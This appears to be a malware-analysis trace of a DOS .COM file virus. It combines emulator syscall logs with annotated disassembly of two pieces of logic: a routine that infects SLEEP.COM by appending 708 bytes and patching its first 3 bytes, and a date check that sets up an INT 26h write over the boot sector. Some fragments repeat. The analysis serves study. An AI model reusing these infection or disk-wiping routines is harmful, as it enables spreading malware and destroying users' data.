0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:10.767025269Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.773109299Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.774303672Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.782440881Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.783733024Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.790168394Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.791631927Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.79784821Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.803790716Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:11.096867202Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:11.100526201Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:11.101781549Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:11.102955032Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
2018-12-25T12:55:11.106197617Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:11.113070417Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:11.119454079Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:11.137505459Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:11.144789216Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:11.145712506Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:11.147175161Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:11.151665788Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:11.152718064Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:11.15812Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:11.159684188Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:11.163978249Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:11.165074576Z 62 PC: 12c46 | Close file
2018-12-25T12:55:11.184102375Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:11.19086635Z 26 PC: 12c62 | Set disk transfer address